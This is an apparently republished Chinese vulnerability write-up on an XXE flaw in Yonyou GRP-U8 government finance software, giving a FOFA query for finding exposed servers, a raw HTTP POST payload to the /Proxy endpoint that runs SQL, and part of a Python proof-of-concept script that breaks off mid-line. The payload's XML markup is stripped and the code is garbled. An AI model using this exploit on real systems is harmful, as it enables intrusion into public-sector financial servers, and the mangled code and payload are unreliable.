用友GRP-U8行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-u8被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有限制外部实体的加载,导致可加载恶意外部文件,可以执行SQL语句,甚至可以执行系统命令。
二、影响版本GRP-U8
三、漏洞复现1.环境搭建fofa语法
title="GRP-U8"
2.漏洞复现(1):执行SQL语句payload
POST/Proxy HTTP/1.1 Host: xxx.xxx.xxx.xxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 386cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataselect@@version
(2):执行SQL语句脚本
代码语言:javascript复制import re import requests import sysiflen(sys.argv) !=2: print("Usage: python poc.py url") print("example: python poc.py http://127.0.0.1:8080") sys.exit(1) url = sys.argv[1] headers = { "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded", } def poc(url): url = url +'/Proxy'print(url) data ='cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataselect@@version'res = requests.post(url,headers=headers,data=data) res = res.text result_row =r'